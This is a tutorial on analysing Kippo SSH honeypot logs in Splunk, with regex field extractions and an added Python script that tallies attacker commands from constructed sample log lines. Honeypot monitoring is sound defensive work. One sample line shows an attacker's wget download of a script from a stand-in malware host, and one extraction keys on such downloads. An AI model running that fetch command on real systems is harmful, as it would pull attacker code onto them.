Using Splunk for Kippo Honeypot Log Analysis

I was recently asked how I can quickly and efficiently analyze Kippo results. The secret is having Kippo generate an additional log and feeding that log into Splunk. Since this data could be useful for researchers everywhere, I've decided to type up a quick tutorial.


In order to have Kippo generate the needed log, you need to create a batch file or shell script designed to generate the log.

For Windows, your batch file will look something like this:
twistd.py -y kippo.tac >> "Kippo.log"

For non-Windows, logging is already enabled by default, and will be saved to:
log/kippo.log

Once Kippo is generating logs, you can either upload these logs to Splunk manually, or use Splunk's Universal Forwarder to upload automatically.



Once the logs are in Splunk, you'll need to start generating fields so you can search for data and export it more easily. As an example, I'll show you how I built the field "Kippo_CmdFull", which holds the full command an attacker entered during a session. Please note I'm using a slightly older version of Splunk, so your screens may look different.

First, do a search for what we're looking for. In this case, search for "command found".


Once you've found the data you're looking for, use the drop-down arrow and select "Extract Fields".


Enter a few commands which you know are present in the log, such as "ls -a", "rm" or "cd".


You'll get some extra data which needs to be filtered out. Unfortunately, Splunk can't always auto-generate the fields accurately if only a few examples are provided.


Ultimately, after filtering out the extra results, you should get something meaningful.


If not, you'll need to resort to writing the extraction as a Regular Expression yourself.



After your fields are generated, you can perform all sorts of statistical analysis on commands used.



For reference, here are the Splunk regex field extractions I have created so far. Please feel free to use them in your own analysis.

Kippo : EXTRACT-Kippo_CmdBase Inline  
(?i)found: (?P<Kippo_CmdBase>[^ ]+)

Kippo : EXTRACT-Kippo_CmdFull Inline  
(?i) found: (?P<Kippo_CmdFull>.+)

Kippo : EXTRACT-Kippo_ConnectStatus Inline  
(?i)/.*?\] (?P<Kippo_ConnectStatus>\w+)

Kippo : EXTRACT-Kippo_MalwareURL Inline  
(?i) wget (?P<Kippo_MalwareURL>.+)

Kippo : EXTRACT-Kippo_SessionID Inline  
(?i)^(?:[^,]*,){1}(?P<Kippo_SessionID>[^\]]+)

Kippo : EXTRACT-Kippo_SessionNumber Inline  
(?i)\[.*?,(?P<Kippo_SessionNumber>\d+)(?=,)

Kippo : EXTRACT-Kippo_SourceClient Inline  
(?i) version: (?P<Kippo_SourceClient>.+)

Kippo : EXTRACT-Kippo_SourceIP Inline  
(?i)^(?:[^,]*,){2}(?P<Kippo_SourceIP>[^\]]+)

Kippo : EXTRACT-Kippo_StatusMsg Inline  
(?i)^(?:[^ ]* ){3}(?P<Kippo_StatusMsg>.+)

Kippo : EXTRACT-Kippo_TargetPass Inline  
(?i)\[.*?/(?P<Kippo_TargetPass>\w+)(?=\])

Kippo : EXTRACT-Kippo_TargetUser Inline  
(?i) .*? \[(?P<Kippo_TargetUser>\w+)(?=/)
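As an added example (not part of the original post), the same extractions can be run outside Splunk with Python's re module, since Splunk's (?P<name>...) group syntax is the same as Python's. The log lines below are constructed in Kippo's log layout (timestamps, session number, IP and commands are made up), and the tally at the end mirrors a "stats count by Kippo_CmdBase" search.

```python
import re
from collections import Counter

# The inline extractions from the post, copied unchanged.
KIPPO_EXTRACTIONS = {
    "Kippo_CmdBase": r"(?i)found: (?P<Kippo_CmdBase>[^ ]+)",
    "Kippo_CmdFull": r"(?i) found: (?P<Kippo_CmdFull>.+)",
    "Kippo_ConnectStatus": r"(?i)/.*?\] (?P<Kippo_ConnectStatus>\w+)",
    "Kippo_MalwareURL": r"(?i) wget (?P<Kippo_MalwareURL>.+)",
    "Kippo_SessionID": r"(?i)^(?:[^,]*,){1}(?P<Kippo_SessionID>[^\]]+)",
    "Kippo_SessionNumber": r"(?i)\[.*?,(?P<Kippo_SessionNumber>\d+)(?=,)",
    "Kippo_SourceClient": r"(?i) version: (?P<Kippo_SourceClient>.+)",
    "Kippo_SourceIP": r"(?i)^(?:[^,]*,){2}(?P<Kippo_SourceIP>[^\]]+)",
    "Kippo_StatusMsg": r"(?i)^(?:[^ ]* ){3}(?P<Kippo_StatusMsg>.+)",
    "Kippo_TargetPass": r"(?i)\[.*?/(?P<Kippo_TargetPass>\w+)(?=\])",
    "Kippo_TargetUser": r"(?i) .*? \[(?P<Kippo_TargetUser>\w+)(?=/)",
}
COMPILED = {name: re.compile(pat) for name, pat in KIPPO_EXTRACTIONS.items()}

# Constructed sample lines in Kippo's log layout (not a real capture).
SAMPLE_LOG = """\
2013-05-18 10:32:08+0000 [HoneyPotTransport,3,10.0.0.5] Remote SSH version: SSH-2.0-libssh2_1.4.2
2013-05-18 10:32:09+0000 [SSHService ssh-userauth on HoneyPotTransport,3,10.0.0.5] login attempt [root/123456] succeeded
2013-05-18 10:32:11+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,10.0.0.5] Command found: uname -a
2013-05-18 10:32:14+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,10.0.0.5] Command found: wget http://malware.example/x.sh
2013-05-18 10:32:20+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,10.0.0.5] Command not found: yum install nmap
"""


def extract_fields(line):
    """Apply every extraction to one line; fields that do not match are absent, as in Splunk."""
    fields = {}
    for name, regex in COMPILED.items():
        m = regex.search(line)
        if m:
            fields[name] = m.group(name)
    return fields


def command_stats(log_text):
    """Count base commands and full command lines, like 'stats count by Kippo_CmdBase'."""
    base, full = Counter(), Counter()
    for line in log_text.splitlines():
        f = extract_fields(line)
        if "Kippo_CmdBase" in f and "Kippo_CmdFull" in f:
            base[f["Kippo_CmdBase"]] += 1
            full[f["Kippo_CmdFull"]] += 1
    return base, full
```

Note that "found: " in the CmdBase and CmdFull extractions also matches Kippo's "Command not found:" lines, so the tally includes commands the honeypot did not emulate; filter on Kippo_StatusMsg if you only want emulated ones.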
